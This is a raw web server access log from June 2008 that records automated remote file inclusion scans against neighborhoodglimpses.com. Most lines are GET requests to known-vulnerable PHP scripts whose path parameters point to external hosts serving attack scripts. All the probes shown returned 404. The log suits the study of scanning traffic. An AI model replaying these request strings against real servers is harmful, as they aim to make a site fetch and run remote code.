67.19.160.58 - - [01/Jun/2008:17:25:05 -0700] "GET /logs/access.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.neighborhoodglimpses.com"
67.19.160.58 - - [01/Jun/2008:17:25:05 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.neighborhoodglimpses.com"
67.19.160.58 - - [01/Jun/2008:17:25:05 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.neighborhoodglimpses.com"
80.67.24.32 - - [01/Jun/2008:17:26:18 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.neighborhoodglimpses.com"
80.67.24.32 - - [01/Jun/2008:17:26:18 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.neighborhoodglimpses.com"
72.29.75.39 - - [01/Jun/2008:17:28:26 -0700] "GET /logs/index.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
72.29.75.39 - - [01/Jun/2008:17:28:26 -0700] "GET /logs/index.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
72.29.75.39 - - [01/Jun/2008:17:28:26 -0700] "GET /index.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
72.29.75.39 - - [01/Jun/2008:17:28:26 -0700] "GET /index.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
200.1.202.61 - - [01/Jun/2008:17:29:12 -0700] "GET /logs/access_080211.log/index.php?go=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
200.1.202.61 - - [01/Jun/2008:17:29:13 -0700] "GET /index.php?go=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
74.200.201.194 - - [01/Jun/2008:17:29:14 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
74.200.201.194 - - [01/Jun/2008:17:29:14 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
74.200.201.194 - - [01/Jun/2008:17:29:14 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
200.1.202.61 - - [01/Jun/2008:17:29:15 -0700] "GET /logs/index.php?go=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
74.200.201.194 - - [01/Jun/2008:17:29:24 -0700] "GET /logs/access_080211.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
74.200.201.194 - - [01/Jun/2008:17:29:24 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
74.200.201.194 - - [01/Jun/2008:17:29:24 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
66.70.14.90 - - [01/Jun/2008:17:29:40 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
66.226.64.33 - - [01/Jun/2008:17:30:25 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
87.106.37.86 - - [01/Jun/2008:17:31:06 -0700] "GET /logs/access.log//include.recipients.group.subnav.php?cfg[path][contenido]=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.37.86 - - [01/Jun/2008:17:31:06 -0700] "GET //include.recipients.group.subnav.php?cfg[path][contenido]=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.37.86 - - [01/Jun/2008:17:31:07 -0700] "GET /logs//include.recipients.group.subnav.php?cfg[path][contenido]=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.226.64.33 - - [01/Jun/2008:17:31:54 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
66.249.73.97 - - [01/Jun/2008:17:31:59 -0700] "GET /logs/access_080505.log HTTP/1.1" 200 11988403 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.neighborhoodglimpses.com"
67.19.160.58 - - [01/Jun/2008:17:35:29 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.neighborhoodglimpses.com"
67.19.160.58 - - [01/Jun/2008:17:35:29 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.neighborhoodglimpses.com"
67.19.160.58 - - [01/Jun/2008:17:35:29 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:17:36:21 -0700] "GET /logs/access_071217.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:17:36:30 -0700] "GET /logs/access_071217.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:17:36:31 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:17:36:32 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:17:36:35 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:17:36:36 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
212.244.43.139 - - [01/Jun/2008:17:37:30 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.neighborhoodglimpses.com"
87.106.37.86 - - [01/Jun/2008:17:38:17 -0700] "GET /logs//include.recipients.group.subnav.php?cfg[path][contenido]=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.37.86 - - [01/Jun/2008:17:38:18 -0700] "GET //include.recipients.group.subnav.php?cfg[path][contenido]=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
193.192.58.2 - - [01/Jun/2008:17:39:06 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
193.192.58.2 - - [01/Jun/2008:17:39:07 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
193.192.58.2 - - [01/Jun/2008:17:39:07 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
219.94.133.251 - - [01/Jun/2008:17:40:28 -0700] "GET /logs/access_080310.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
219.94.133.251 - - [01/Jun/2008:17:40:29 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.70.14.90 - - [01/Jun/2008:17:41:59 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
66.70.14.90 - - [01/Jun/2008:17:42:00 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:17:42:25 -0700] "GET /logs/access_071217.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:17:42:35 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:17:42:39 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.53.229.194 - - [01/Jun/2008:17:44:13 -0700] "GET //component/option,com_performs/Itemid,0/formid,1/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
74.53.229.194 - - [01/Jun/2008:17:44:13 -0700] "GET /logs//component/option,com_performs/Itemid,0/formid,1/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "neighborhoodglimpses.com"
219.94.133.251 - - [01/Jun/2008:17:46:17 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
219.94.133.251 - - [01/Jun/2008:17:46:17 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
85.234.133.173 - - [01/Jun/2008:17:47:44 -0700] "GET /passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.neighborhoodglimpses.com"
85.234.133.173 - - [01/Jun/2008:17:47:44 -0700] "GET /logs/passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.neighborhoodglimpses.com"
74.53.229.194 - - [01/Jun/2008:17:48:14 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.neighborhoodglimpses.com"
74.53.229.194 - - [01/Jun/2008:17:48:14 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.neighborhoodglimpses.com"
193.192.58.2 - - [01/Jun/2008:17:48:23 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
193.192.58.2 - - [01/Jun/2008:17:48:23 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
216.67.238.88 - - [01/Jun/2008:17:49:28 -0700] "GET /logs/passwd.php?env[include_prefix]=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.neighborhoodglimpses.com"
216.67.238.88 - - [01/Jun/2008:17:49:28 -0700] "GET /passwd.php?env[include_prefix]=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.neighborhoodglimpses.com"
88.191.63.70 - - [01/Jun/2008:17:50:35 -0700] "GET /passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.neighborhoodglimpses.com"
88.191.63.70 - - [01/Jun/2008:17:50:35 -0700] "GET /logs/passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.neighborhoodglimpses.com"
85.234.133.173 - - [01/Jun/2008:17:50:36 -0700] "GET /passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "neighborhoodglimpses.com"
85.234.133.173 - - [01/Jun/2008:17:50:49 -0700] "GET /logs/passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "neighborhoodglimpses.com"
61.58.40.55 - - [01/Jun/2008:17:51:40 -0700] "GET /passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.neighborhoodglimpses.com"
61.58.40.55 - - [01/Jun/2008:17:51:40 -0700] "GET /logs/passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.neighborhoodglimpses.com"
216.67.238.88 - - [01/Jun/2008:17:52:42 -0700] "GET /passwd.php?env[include_prefix]=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "neighborhoodglimpses.com"
216.67.238.88 - - [01/Jun/2008:17:52:42 -0700] "GET /logs/passwd.php?env[include_prefix]=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "neighborhoodglimpses.com"
194.85.89.204 - - [01/Jun/2008:17:53:37 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
194.85.89.204 - - [01/Jun/2008:17:53:37 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
194.85.89.204 - - [01/Jun/2008:17:53:38 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
88.191.63.70 - - [01/Jun/2008:17:53:56 -0700] "GET /passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "neighborhoodglimpses.com"
88.191.63.70 - - [01/Jun/2008:17:53:56 -0700] "GET /logs/passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "neighborhoodglimpses.com"
61.58.40.55 - - [01/Jun/2008:17:55:02 -0700] "GET /logs/passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "neighborhoodglimpses.com"
61.58.40.55 - - [01/Jun/2008:17:55:02 -0700] "GET /passwd.php?env[include_prefix]=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "neighborhoodglimpses.com"
91.193.143.7 - - [01/Jun/2008:17:56:03 -0700] "GET /logs/access_080211.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
91.193.143.7 - - [01/Jun/2008:17:56:04 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
91.193.143.7 - - [01/Jun/2008:17:56:05 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
194.85.89.204 - - [01/Jun/2008:17:56:59 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
119.110.98.132 - - [01/Jun/2008:17:57:02 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_080414.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
193.192.58.2 - - [01/Jun/2008:17:57:43 -0700] "GET /logs/access.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
193.192.58.2 - - [01/Jun/2008:17:57:43 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
193.192.58.2 - - [01/Jun/2008:17:57:43 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
72.29.75.39 - - [01/Jun/2008:17:59:10 -0700] "GET /index.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
72.29.75.39 - - [01/Jun/2008:17:59:10 -0700] "GET /index.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
200.87.179.130 - - [01/Jun/2008:17:59:14 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.87.179.130 - - [01/Jun/2008:17:59:14 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.87.179.130 - - [01/Jun/2008:17:59:17 -0700] "GET //skin/zero_vote/error.php?dir=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.87.179.130 - - [01/Jun/2008:17:59:17 -0700] "GET //skin/zero_vote/error.php?dir=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.87.179.130 - - [01/Jun/2008:17:59:19 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.87.179.130 - - [01/Jun/2008:17:59:19 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.53.229.194 - - [01/Jun/2008:17:59:40 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
74.53.229.194 - - [01/Jun/2008:17:59:41 -0700] "GET //includes/functions_portal.php?phpbb_root_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
83.65.47.4 - - [01/Jun/2008:17:59:56 -0700] "GET /logs/access_080211.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
83.65.47.4 - - [01/Jun/2008:17:59:56 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
83.65.47.4 - - [01/Jun/2008:17:59:57 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
206.123.114.66 - - [01/Jun/2008:18:01:27 -0700] "GET /logs/access.log/index.php?go=http://amazu.de/.d/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
206.123.114.66 - - [01/Jun/2008:18:01:27 -0700] "GET /index.php?go=http://amazu.de/.d/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
206.123.114.66 - - [01/Jun/2008:18:01:27 -0700] "GET /logs/index.php?go=http://amazu.de/.d/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
206.123.114.66 - - [01/Jun/2008:18:02:47 -0700] "GET /logs/access_080211.log/index.php?go=http://amazu.de/.d/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
206.123.114.66 - - [01/Jun/2008:18:02:47 -0700] "GET /index.php?go=http://amazu.de/.d/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
206.123.114.66 - - [01/Jun/2008:18:02:47 -0700] "GET /logs/index.php?go=http://amazu.de/.d/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
209.62.24.242 - - [01/Jun/2008:18:06:14 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://purukcahu.sitesled.com/newbot/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.neighborhoodglimpses.com"
